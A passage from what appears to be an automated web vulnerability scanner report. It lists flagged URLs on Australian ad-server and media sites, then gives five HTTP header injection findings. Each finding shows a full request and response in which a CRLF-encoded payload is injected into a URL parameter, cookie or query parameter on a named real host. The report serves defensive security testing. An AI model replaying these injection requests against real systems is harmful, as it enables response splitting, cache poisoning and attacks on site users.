2.686. http://media.sensis.com.au/hserver/acc_random=980327086859/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=1x1/POSITION=BLW1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=122954556302 [REST URL parameter 2]

2.687. http://media.sensis.com.au/hserver/acc_random=980327086859/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=1x1/POSITION=BLW1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=122954556302 [name of an arbitrarily supplied request parameter]

2.688. http://media.sensis.com.au/hserver/acc_random=983184589154/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=3/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=146995204521 [REST URL parameter 1]

2.689. http://media.sensis.com.au/hserver/acc_random=983184589154/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=3/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=146995204521 [REST URL parameter 2]

2.690. http://media.sensis.com.au/hserver/acc_random=983184589154/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=3/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=146995204521 [name of an arbitrarily supplied request parameter]

2.691. http://media.sensis.com.au/hserver/acc_random=985211913613/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.HOMEPAGE/AAMSZ=4x1/pageid=365717345415 [REST URL parameter 1]

2.692. http://media.sensis.com.au/hserver/acc_random=985211913613/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.HOMEPAGE/AAMSZ=4x1/pageid=365717345415 [REST URL parameter 2]

2.693. http://media.sensis.com.au/hserver/acc_random=985211913613/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.HOMEPAGE/AAMSZ=4x1/pageid=365717345415 [name of an arbitrarily supplied request parameter]

2.694. http://media.sensis.com.au/hserver/acc_random=987234488525/SITE=TEL.BIGPOND.MUSIC.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.MUSIC.HOME/AAMSZ=1x1/POSITION=BLW1/pageid=369648929007 [REST URL parameter 1]

2.695. http://media.sensis.com.au/hserver/acc_random=987234488525/SITE=TEL.BIGPOND.MUSIC.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.MUSIC.HOME/AAMSZ=1x1/POSITION=BLW1/pageid=369648929007 [REST URL parameter 2]

2.696. http://media.sensis.com.au/hserver/acc_random=987234488525/SITE=TEL.BIGPOND.MUSIC.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.MUSIC.HOME/AAMSZ=1x1/POSITION=BLW1/pageid=369648929007 [name of an arbitrarily supplied request parameter]

2.697. http://media.sensis.com.au/hserver/acc_random=995049956445/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=4x1/POSITION=ABV1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=146995204521 [REST URL parameter 1]

2.698. http://media.sensis.com.au/hserver/acc_random=995049956445/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=4x1/POSITION=ABV1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=146995204521 [REST URL parameter 2]

2.699. http://media.sensis.com.au/hserver/acc_random=995049956445/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=4x1/POSITION=ABV1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=146995204521 [name of an arbitrarily supplied request parameter]

2.700. http://media.sensis.com.au/hserver/acc_random=995441455010/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.OTHER/AAMSZ=100x29/POSITION=headernav/pageid=373826094244 [REST URL parameter 1]

2.701. http://media.sensis.com.au/hserver/acc_random=995441455010/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.OTHER/AAMSZ=100x29/POSITION=headernav/pageid=373826094244 [REST URL parameter 2]

2.702. http://media.sensis.com.au/hserver/acc_random=995441455010/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.OTHER/AAMSZ=100x29/POSITION=headernav/pageid=373826094244 [name of an arbitrarily supplied request parameter]

2.703. http://media.sensis.com.au/hserver/acc_random=995441455010/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.OTHER/AAMSZ=100x29/POSITION=headernav/pageid=373826094244 [name of an arbitrarily supplied request parameter]

2.704. http://media.sensis.com.au/hserver/acc_random=998242088404/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=2/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=746311742193 [REST URL parameter 1]

2.705. http://media.sensis.com.au/hserver/acc_random=998242088404/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=2/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=746311742193 [REST URL parameter 2]

2.706. http://media.sensis.com.au/hserver/acc_random=998242088404/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=2/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=746311742193 [name of an arbitrarily supplied request parameter]

2.707. http://media.sensis.com.au/hserver/acc_random=998242088404/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=3/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=746311742193 [REST URL parameter 1]

2.708. http://media.sensis.com.au/hserver/acc_random=998242088404/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=3/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=746311742193 [REST URL parameter 2]

2.709. http://media.sensis.com.au/hserver/acc_random=998242088404/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=3/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=746311742193 [name of an arbitrarily supplied request parameter]

2.710. http://media.sensis.com.au/jserver/acc_random=676490127433/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.HOMEPAGE/AAMSZ=300x250/POSITION=BLW3/pageid=365717345415 [REST URL parameter 1]

2.711. http://media.sensis.com.au/jserver/acc_random=676490127433/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.HOMEPAGE/AAMSZ=300x250/POSITION=BLW3/pageid=365717345415 [REST URL parameter 2]

2.712. http://media.sensis.com.au/jserver/acc_random=676490127433/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.HOMEPAGE/AAMSZ=300x250/POSITION=BLW3/pageid=365717345415 [name of an arbitrarily supplied request parameter]

2.713. http://media.sensis.com.au/jserver/acc_random=951172862928/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.HOMEPAGE/AAMSZ=300x250/POSITION=BLW2/pageid=365717345415 [REST URL parameter 1]

2.714. http://media.sensis.com.au/jserver/acc_random=951172862928/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.HOMEPAGE/AAMSZ=300x250/POSITION=BLW2/pageid=365717345415 [REST URL parameter 2]

2.715. http://media.sensis.com.au/jserver/acc_random=951172862928/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.HOMEPAGE/AAMSZ=300x250/POSITION=BLW2/pageid=365717345415 [name of an arbitrarily supplied request parameter]

2.716. http://media.sensis.com.au/jserver/acc_random=986959504930/SITE=TEL.BIGPOND.GAMEARENA.GAMING/AAMSZ=300x250/AREA=GAMING.GAMEARENA.ALLPLATFORMS.NEWS/POSITION=ABV1/pageid=260571614373 [REST URL parameter 1]

2.717. http://media.sensis.com.au/jserver/acc_random=986959504930/SITE=TEL.BIGPOND.GAMEARENA.GAMING/AAMSZ=300x250/AREA=GAMING.GAMEARENA.ALLPLATFORMS.NEWS/POSITION=ABV1/pageid=260571614373 [REST URL parameter 2]

2.718. http://media.sensis.com.au/jserver/acc_random=986959504930/SITE=TEL.BIGPOND.GAMEARENA.GAMING/AAMSZ=300x250/AREA=GAMING.GAMEARENA.ALLPLATFORMS.NEWS/POSITION=ABV1/pageid=260571614373 [name of an arbitrarily supplied request parameter]

2.719. http://www.bigpondoffice.com.au/common/main.tfo [REST URL parameter 1]

2.720. http://www.gamearena.com.au/news/ [name of an arbitrarily supplied request parameter]

2.721. http://www.gamearena.com.au/shop/games/ [name of an arbitrarily supplied request parameter]

2.722. http://www.gamearena.com.au/shop/games/title/hearts-medicine-season-one/index.php [REST URL parameter 5]

2.723. http://www.gamearena.com.au/shop/games/title/hearts-medicine-season-one/index.php [name of an arbitrarily supplied request parameter]

2.724. http://www.gamearena.com.au/shop/games/title/secret-diaries-florence-ashford/index.php [REST URL parameter 5]

2.725. http://www.gamearena.com.au/shop/games/title/secret-diaries-florence-ashford/index.php [name of an arbitrarily supplied request parameter]

2.726. http://www.gamearena.com.au/shop/games/title/the-seawise-chronicles-untamed-legacy/index.php [REST URL parameter 5]

2.727. http://www.gamearena.com.au/shop/games/title/the-seawise-chronicles-untamed-legacy/index.php [name of an arbitrarily supplied request parameter]

2.728. http://www.gamearena.com.au/shop/games/title/the-treasures-of-mystery-island-2-the-gates-of-fate/index.php [REST URL parameter 5]

2.729. http://www.gamearena.com.au/shop/games/title/the-treasures-of-mystery-island-2-the-gates-of-fate/index.php [name of an arbitrarily supplied request parameter]

2.730. http://www.gamearena.com.au/shop/mobile/ [name of an arbitrarily supplied request parameter]

2.731. http://www.gamearena.com.au/shop/mobile/game.x/call-of-duty-black-ops-mobile/index.php [REST URL parameter 5]

2.732. http://www.gamearena.com.au/shop/mobile/game.x/call-of-duty-black-ops-mobile/index.php [name of an arbitrarily supplied request parameter]

2.733. http://www.telstra.net/ops/ [REST URL parameter 1]

2.734. http://www.utest.com/how-it-works/agile-testing [name of an arbitrarily supplied request parameter]

2.735. http://www.utest.com/intro [name of an arbitrarily supplied request parameter]

2.736. http://www.utest.com/meet-testers [name of an arbitrarily supplied request parameter]

2.737. http://www.utest.com/pricing [name of an arbitrarily supplied request parameter]

2.738. http://www.utest.com/what-we-test/desktop-application-testing [name of an arbitrarily supplied request parameter]

2.739. http://www.utest.com/what-we-test/gaming-application-testing [name of an arbitrarily supplied request parameter]

2.740. http://www.virtualmedicalcentre.com/ [name of an arbitrarily supplied request parameter]

2.741. http://www.virtualmedicalcentre.com/calc.asp [name of an arbitrarily supplied request parameter]

2.742. http://www.virtualmedicalcentre.com/caloriecounter.asp [name of an arbitrarily supplied request parameter]

2.743. http://www.virtualmedicalcentre.com/caloriecounter.asp [name of an arbitrarily supplied request parameter]

2.744. http://www.virtualmedicalcentre.com/diseases.asp [name of an arbitrarily supplied request parameter]

2.745. http://www.virtualmedicalcentre.com/experiences.asp [name of an arbitrarily supplied request parameter]

2.746. http://www.virtualmedicalcentre.com/featuredpages.asp [name of an arbitrarily supplied request parameter]

2.747. http://www.virtualmedicalcentre.com/healthandlifestyle.asp [name of an arbitrarily supplied request parameter]

2.748. http://www.virtualmedicalcentre.com/healthinvestigations.asp [name of an arbitrarily supplied request parameter]

2.749. http://www.virtualmedicalcentre.com/treatments.asp [name of an arbitrarily supplied request parameter]

2.750. http://www.virtualmedicalcentre.com/videopage.asp [name of an arbitrarily supplied request parameter]

2.751. http://bigpondmusic.com/mixtapes/create [Referer HTTP header]

2.752. http://bigpondmusic.com/mixtapes/favourites [Referer HTTP header]

2.753. http://bigpondmusic.com/mixtapes/my [Referer HTTP header]

2.754. http://mysite.com/accordion.htm [Referer HTTP header]

2.755. http://www.tradingpost.com.au/ [SelectedState cookie]

2.756. http://www.tradingpost.com.au/Automotive/Browse [SelectedState cookie]

2.757. http://www.tradingpost.com.au/Automotive/Caravans/Browse [SelectedState cookie]

2.758. http://www.tradingpost.com.au/Automotive/Motorbikes-ATVs/Browse [SelectedState cookie]

2.759. http://www.tradingpost.com.au/Automotive/Trailers/Browse [SelectedState cookie]

2.760. http://www.tradingpost.com.au/Automotive/Wheels-Tyres-Parts-Accessories/Browse [SelectedState cookie]

2.761. http://www.tradingpost.com.au/Boats/Browse [SelectedState cookie]

2.762. http://www.tradingpost.com.au/Browse/View-All [SelectedState cookie]

2.763. http://www.tradingpost.com.au/Business-Office/Browse [SelectedState cookie]

2.764. http://www.tradingpost.com.au/Buy [SelectedState cookie]

2.765. http://www.tradingpost.com.au/CommunityPage/LandingPage [SelectedState cookie]

2.766. http://www.tradingpost.com.au/DIY-Home-Renovations/Browse [SelectedState cookie]

2.767. http://www.tradingpost.com.au/Garden-Outdoor-Living/Browse [SelectedState cookie]

2.768. http://www.tradingpost.com.au/Home [SelectedState cookie]

2.769. http://www.tradingpost.com.au/Pets-Horses/Browse [SelectedState cookie]

2.770. http://www.tradingpost.com.au/Real-Estate/Browse [SelectedState cookie]

2.771. http://www.tradingpost.com.au/Rural-Machinery/Browse [SelectedState cookie]

2.772. http://www.tradingpost.com.au/Sell [SelectedState cookie]

2.773. http://www.tradingpost.com.au/Sell-Car/LandingPage [SelectedState cookie]

2.774. http://www.tradingpost.com.au/Sport-Leisure-Travel/Browse [SelectedState cookie]

2.775. http://www.tradingpost.com.au/TrustAndSafety/LandingPage [SelectedState cookie]

2.776. https://www.tradingpost.com.au/Sell [SelectedState cookie]



1. HTTP header injection
There are 8 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.


1.1. http://ad.au.vulnerable.ad.partner/ad/N799.Sensis12/B4964893.2 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.au.doubleclick.net
Path:   /ad/N799.Sensis12/B4964893.2

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 2eb19%0d%0a0017009d30b was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /2eb19%0d%0a0017009d30b/N799.Sensis12/B4964893.2;sz=300x250;click=http://media.sensis.com.au/ADCLICK/CID=000341f81f45920200000000/acc_random=676490127433/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.HOMEPAGE/AAMSZ=300x250/POSITION=BLW3/pageid=365717345415/relocate=;ord=676490127433?\ HTTP/1.1
Host: ad.au.vulnerable.ad.partner
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=228ef07ef3000058|642050/658692/14936,685973/842351/14935,2587594/905577/14935,2148193/710316/14932,2284052/769449/14932,2687966/927840/14932,865138/548417/14932,1359940/510872/14932,2530996/887296/14932,2579983/399676/14932,2624219/617185/14928,189445/48295/14926,1393346/903624/14921,2384669/984905/14921,2199899/552974/14921,1886972/1005586/14921,1559855/505298/14921,1139856/361192/14920,1319645/370076/14920,2761768/958300/14920,2569617/889517/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc;

Response

HTTP/1.0 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/2eb19
0017009d30b
/N799.Sensis12/B4964893.2;sz=300x250;click=http://media.sensis.com.au/ADCLICK/CID=000341f81f45920200000000/acc_random=676490127433/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.HOMEPAGE/AAMSZ=300x250/POSITION=BLW3/pageid=365717345415/relocate%3D%3Bord%3D676490127433

<h1>Error 302 Moved Temporarily</h1>

1.2. http://ad.au.vulnerable.ad.partner/adj/N4517.128549.SENSISMEDIASMART3/B4907445 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.au.doubleclick.net
Path:   /adj/N4517.128549.SENSISMEDIASMART3/B4907445

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 56c09%0d%0a5d40b08f4f5 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /56c09%0d%0a5d40b08f4f5/N4517.128549.SENSISMEDIASMART3/B4907445;abr=!ie;click=http://media.sensis.com.au/ADCLICK/CID=0003307e1f45920200000000/acc_random=951172862928/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.HOMEPAGE/AAMSZ=300x250/POSITION=BLW2/pageid=365717345415/relocate=;sz=300x250;ord=951172862928? HTTP/1.1
Host: ad.au.vulnerable.ad.partner
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=228ef07ef3000058|642050/658692/14936,685973/842351/14935,2587594/905577/14935,2148193/710316/14932,2284052/769449/14932,2687966/927840/14932,865138/548417/14932,1359940/510872/14932,2530996/887296/14932,2579983/399676/14932,2624219/617185/14928,189445/48295/14926,1393346/903624/14921,2384669/984905/14921,2199899/552974/14921,1886972/1005586/14921,1559855/505298/14921,1139856/361192/14920,1319645/370076/14920,2761768/958300/14920,2569617/889517/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc;

Response

HTTP/1.0 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/56c09
5d40b08f4f5
/N4517.128549.SENSISMEDIASMART3/B4907445;abr=!ie;click=http://media.sensis.com.au/ADCLICK/CID=0003307e1f45920200000000/acc_random=951172862928/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.HOMEPAGE/AAMSZ=300x250/POSITION=BLW2/pageid=365717345415/relocate%3D%3Bsz%3D300

<h1>Error 302 Moved Temporarily</h1>

1.3. http://ad.au.vulnerable.ad.partner/jump/N799.Sensis12/B4964893.2 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.au.doubleclick.net
Path:   /jump/N799.Sensis12/B4964893.2

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 6a7fd%0d%0aac0f46de021 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /6a7fd%0d%0aac0f46de021/N799.Sensis12/B4964893.2;sz=300x250;click=http://media.sensis.com.au/ADCLICK/CID=000341f81f45920200000000/acc_random=676490127433/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.HOMEPAGE/AAMSZ=300x250/POSITION=BLW3/pageid=365717345415/relocate=;ord=676490127433?\ HTTP/1.1
Host: ad.au.vulnerable.ad.partner
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=228ef07ef3000058|642050/658692/14936,685973/842351/14935,2587594/905577/14935,2148193/710316/14932,2284052/769449/14932,2687966/927840/14932,865138/548417/14932,1359940/510872/14932,2530996/887296/14932,2579983/399676/14932,2624219/617185/14928,189445/48295/14926,1393346/903624/14921,2384669/984905/14921,2199899/552974/14921,1886972/1005586/14921,1559855/505298/14921,1139856/361192/14920,1319645/370076/14920,2761768/958300/14920,2569617/889517/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc;

Response

HTTP/1.0 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/6a7fd
ac0f46de021
/N799.Sensis12/B4964893.2;sz=300x250;click=http://media.sensis.com.au/ADCLICK/CID=000341f81f45920200000000/acc_random=676490127433/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.HOMEPAGE/AAMSZ=300x250/POSITION=BLW3/pageid=365717345415/relocate%3D%3Bord%3D676490127433

<h1>Error 302 Moved Temporarily</h1>

1.4. http://bs.serving-sys.com/BurstingPipe/BannerRedirect.asp [eyeblaster cookie]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/BannerRedirect.asp

Issue detail

The value of the eyeblaster cookie is copied into the Set-Cookie response header. The payload 10a5a%0d%0af9168891924 was submitted in the eyeblaster cookie. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/BannerRedirect.asp HTTP/1.1
Host: bs.serving-sys.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: F1=00UilH0003sY9PGI; U=d40d05dc-9ee9-4d31-923b-440dda2f03473EI03g; A2=dtA69MH60aVX0000820wrMetid9Qa903Gz9Qa961worWez3M9MXe05qO9MXhe3wUrNfBAg9QdG03ai0000o61wrWfpvx9Qbf0bKd0000820wrWeQyI9KVU0bnA0000820wrHeT709LaB0a4c9KVBK42UrIei.Q9EyK07ft0000o61wrpfpuV9Qas0bKd0000g410rWeZOX9Qdt03ai0000820wrWePZ99P6K07l00000g210rTedj59B6M09Gc0000820wrffhPu9MHD0bnA0000820wrMff3e9P0S03sY0000820wrTe1YN9KVH08te0000820wrHdtFJ9MH60aVX0000820wrMf2Ca9KVJ02Hn0000820wrHeT809KVD0a4c9KVEm5xorHeC519MH60aVX00008y8yrMfGff9Qd70bPK9Qd9e3wUrWeBgi9QdI04PT0000820wrWf5Kg9KTC07g60000820wrHedd99KVI077T0000820wrHewrC9P6K0bfD0000820wrTdP239QaW0bfK0000820wrW; eyeblaster=BWVal=1259&BWDate=40494.848912&debuglevel=&FLV=10.1103&RES=128&WMPV=010a5a%0d%0af9168891924; B2=7grL0820wrH6VCF0820wrf6SKe0820wrH6OeH0820wrW7hMi0m5xorH7FL40o61wrW785p0820wrW76AK0e3wUrN7fP70820wrW7nwv0820wrH6V2p0820wrH745g061worW7yh30g410rW5suX0g210rT7nig0820wrH70vL0o61wrp7yh50820wrW74..0820wrT7FLX0e3wUrW7luQ0820wrM6UUT0820wrT6E4C0gA92rM7hMh0K42UrI6E4D0820wrM; u2=d40d05dc-9ee9-4d31-923b-440dda2f03473EI03g; E2=0aVXoC9yrM07l0g210rT077T820wrH03aiw820rW08te820wrH0bfK820wrW02Hn820wrH07fto61wrp0a4cS43orI03sY820wrT05qOe3wUrN03Gz61worW09Gc820wrf0bfDe3wUrT0bKdo61wrW0bPKe3wUrW0bnAg410rM07g6820wrH04PT820wrW; C3=0ppCg210rT0000001_0sJzoC9yrM0200000_0vq9o61wrW0000001_0t+c820wrT000000g_0rUe820wrW0000001_0u3Je3wUrN0000020_0uv2820wrH0000001_0u6F820wrM0000040_0tIT820wrH0000080_0tye820wrW0000001_0uSU820wrW0000008_0tUC820wrT0008000_0tJNo61wrW0000001_0uf9820wrH0000w00_0tUd820wrH0000001_0vHUe3wUrW0000001_0sTh820wrf0000001_0uXiS43orI0000002_0upO61worW0000000_0uRt820wrH00000g0_0t8ko61wrp0000w00_; u3=1; ActivityInfo=000ltNb65%5f; D3=0upO009p61worW0sJz02lBoC9yrM0vq905Zwo61wrW0t8k00iZo61wrp0uSU00m+820wrW0tye01xc820wrW0tJN00m+o61wrW0u3J01B9e3wUrN0tIT00cN820wrH0uXi00Y3S43orI0tUC0053820wrT0t+c00iZ820wrT0u6F004H820wrM0tUd001N820wrH0rUe00m+820wrW0ppC00iZg210rT0vHU00m+e3wUrW0uRt03HD820wrH0uf900EM820wrH0sTh00ai820wrf0uv201xc820wrH;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 0
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
P3P: policyref=http://www.eyeblaster.com/p3p/Eyeblaster-served-p3p2.xml,CP="NOI DEVa OUR BUS UNI"
X-Powered-By: ASP.NET
Set-Cookie: eyeblaster=BWVal=1259&BWDate=40494.848912&debuglevel=&FLV=10.1103&RES=128&WMPV=010a5a
f9168891924
; expires=Thu, 31-Dec-2037 22: 00:00 GMT; domain=bs.serving-sys.com; path=/
Set-Cookie: u2=d40d05dc-9ee9-4d31-923b-440dda2f03473EI03g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: U=d40d05dc-9ee9-4d31-923b-440dda2f03473EI03g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/
Connection: close


1.5. http://bs.serving-sys.com/BurstingPipe/BannerSource.asp [Pos parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/BannerSource.asp

Issue detail

The value of the Pos request parameter is copied into the Set-Cookie response header. The payload 504f0%0d%0a52c6ed00ba4 was submitted in the Pos parameter. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/BannerSource.asp?FlightID=2006011&Page=&PluID=0&Pos=504f0%0d%0a52c6ed00ba4 HTTP/1.1
Host: bs.serving-sys.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: F1=00UilH0003sY9PGI; U=d40d05dc-9ee9-4d31-923b-440dda2f03473EI03g; A2=dtA69MH60aVX0000820wrMetid9Qa903Gz9Qa961worWez3M9MXe05qO9MXhe3wUrNfBAg9QdG03ai0000o61wrWfpvx9Qbf0bKd0000820wrWeQyI9KVU0bnA0000820wrHeT709LaB0a4c9KVBK42UrIei.Q9EyK07ft0000o61wrpfpuV9Qas0bKd0000g410rWeZOX9Qdt03ai0000820wrWePZ99P6K07l00000g210rTedj59B6M09Gc0000820wrffhPu9MHD0bnA0000820wrMff3e9P0S03sY0000820wrTe1YN9KVH08te0000820wrHdtFJ9MH60aVX0000820wrMf2Ca9KVJ02Hn0000820wrHeT809KVD0a4c9KVEm5xorHeC519MH60aVX00008y8yrMfGff9Qd70bPK9Qd9e3wUrWeBgi9QdI04PT0000820wrWf5Kg9KTC07g60000820wrHedd99KVI077T0000820wrHewrC9P6K0bfD0000820wrTdP239QaW0bfK0000820wrW; eyeblaster=BWVal=1259&BWDate=40494.848912&debuglevel=&FLV=10.1103&RES=128&WMPV=0; 